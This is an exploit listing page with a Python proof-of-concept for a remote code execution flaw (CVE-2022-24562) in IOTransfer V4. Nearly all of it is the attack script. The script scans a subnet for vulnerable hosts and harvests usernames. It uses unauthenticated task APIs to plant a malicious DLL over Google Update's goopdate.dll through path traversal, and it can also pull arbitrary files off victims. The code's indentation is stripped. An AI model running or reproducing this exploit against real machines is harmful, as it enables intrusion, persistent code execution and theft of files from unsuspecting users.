IOTransfer 4.0 Remote Code Execution

IOTransfer version 4.0 suffers from a remote code execution vulnerability.


SHA-256 | c710e2da6c6ed4ef7a63d1d4f9778557d2652281b2fc26cee33fa39fd5d1ca51

# Exploit Title: IOTransfer V4 – Remote Code Execution (RCE)
# Date: 06/22/2022
# Exploit Author: Tomer Peled
# Vendor Homepage: https://www.iobit.com
# Software Link: https://iotransfer.itopvpn.com/
# Version: V4 and onward
# Tested on: Windows 10
# CVE : 2022-24562
# References: https://github.com/tomerpeled92/CVE/tree/main/CVE-2022%E2%80%9324562

import os
from urllib3.exceptions import ConnectTimeoutError
from win32com.client import *
import requests
import json

localPayloadPath = r"c:\temp\malicious.dll"
remotePayloadPath="../Program Files (x86)/Google/Update/goopdate.dll"
remoteDownloadPath = r'C:\Users\User\Desktop\obligationservlet.pdf'
Range = "192.168.89"
UpOrDown="Upload"
IP = ""
UserName = ""

def get_version_number(file_path):
information_parser = Dispatch("Scripting.FileSystemObject")
version = information_parser.GetFileVersion(file_path)
return version


def getTaskList(IP, taskid=""):
print("Getting task list...")
url = f'http://{IP}:7193/index.php?action=gettasklist&userid=*'
res = requests.get(url)
tasks = json.loads(res.content)
tasks = json.loads(tasks['content'])
for task in tasks['tasks']:
if taskid == task['taskid']:
print(f"Task ID found: {taskid}")


def CreateUploadTask(IP):
SetSavePath(IP)
url = f'http://{IP}:7193/index.php?action=createtask'
task = {
'method': 'get',
'version': '1',
'userid': '*',
'taskstate': '0',
}
res = requests.post(url, json=task)
task = json.loads(res.content)
task = json.loads(task['content'])
taskid = task['taskid']
print(f"[*] TaskID: {taskid}")
return taskid


def CreateUploadDetailNode(IP, taskid, remotePath, size='100'):
url = f'http://{IP}:7193/index.php?action=settaskdetailbyindex&userid=*&taskid={taskid}&index=0'
file_info = {
'size': size,
'savefilename': remotePath,
'name': remotePath,
'fullpath': r'c:\windows\system32\calc.exe',
'md5': 'md5md5md5md5md5',
'filetype': '3',
}
res = requests.post(url, json=file_info)
js = json.loads(res.content)
print(f"[V] Create Detail returned: {js['code']}")


def readFile(Path):
file = open(Path, "rb")
byte = file.read(1)
next = "Start"
while next != b'':
byte = byte + file.read(1023)
next = file.read(1)
if next != b'':
byte = byte + next
file.close()
return byte


def CallUpload(IP, taskid, localPayloadPath):
url = f'http://{IP}:7193/index.php?action=newuploadfile&userid=*&taskid={taskid}&index=0'
send_data = readFile(localPayloadPath)
try:
res = requests.post(url, data=send_data)
js = json.loads(res.content)
if js['code'] == 200:
print("[V] Success payload uploaded!")
else:
print(f"CreateRemoteFile: {res.content}")
except:
print("[*] Reusing the task...")
res = requests.post(url, data=send_data)
js = json.loads(res.content)
if js['code'] == 200 or "false" in js['error']:
print("[V] Success payload uploaded!")
else:
print(f"[X] CreateRemoteFile Failed: {res.content}")


def SetSavePath(IP):
url = f'http://{IP}:7193/index.php?action=setiotconfig'
config = {
'tasksavepath': 'C:\\Program '
}
requests.post(url, json=config)

def ExploitUpload(IP,payloadPath,rPath,taskid =None):
if not taskid:
taskid = CreateUploadTask(IP)
size = os.path.getsize(payloadPath)
CreateUploadDetailNode(IP, taskid, remotePath=rPath, size=str(size))
CallUpload(IP, taskid, payloadPath)


def CreateDownloadTask(IP, Path) -> str:
url = f'http://{IP}:7193/index.php?action=createtask'
task = {
'method': 'get',
'version': '1',
'userid': '*',
'taskstate': '0',
'filepath': Path
}
res = requests.post(url, json=task)
task = json.loads(res.content)
task = json.loads(task['content'])
taskid = task['taskid']
print(f"TaskID: {taskid}")
return taskid


def ExploitDownload(IP, DownloadPath, ID=None):
if ID:
url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={ID}'
else:
taskid = CreateDownloadTask(IP, DownloadPath)
url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={taskid}'
res = requests.get(url)
return res

def ScanIP(startRange):
print("[*] Searching for vulnerable IPs", end='')
Current = 142
IP = f"{startRange}.{Current}"
VulnerableIP: str = ""
UserName: str = ""
while Current < 252:
print(".", end='')
url = f'http://{IP}:7193/index.php?action=getpcname&userid=*'
try:
res = requests.get(url, timeout=1)
js = json.loads(res.content)
js2 = json.loads(js['content'])
UserName = js2['name']
VulnerableIP=IP
print(f"\n[V] Found a Vulnerable IP: {VulnerableIP}")
print(f"[!] Vulnerable PC username: {UserName}")
return VulnerableIP,UserName
except Exception as e:
pass
except ConnectTimeoutError:
pass
IP = f"{startRange}.{Current}"
Current = Current + 1
return None,None


if __name__ == '__main__':
IP,UserName = ScanIP(Range)
if IP is None or UserName is None:
print("[X] No vulnerable IP found")
exit()
print("[*] Starting Exploit...")
if UpOrDown == "Upload":
print(f"[*]Local Payload Path: {localPayloadPath}")
print(f"[*]Remote Upload Path: {remotePayloadPath}")
ExploitUpload(IP,localPayloadPath,remotePayloadPath)
elif UpOrDown == "Download":
print(f"[*] Downloading the file: {remoteDownloadPath}")
res = ExploitDownload(IP, remoteDownloadPath)
file = open("out.pdf", "wb+")
file.write(res.content)
file.close()


Related Posts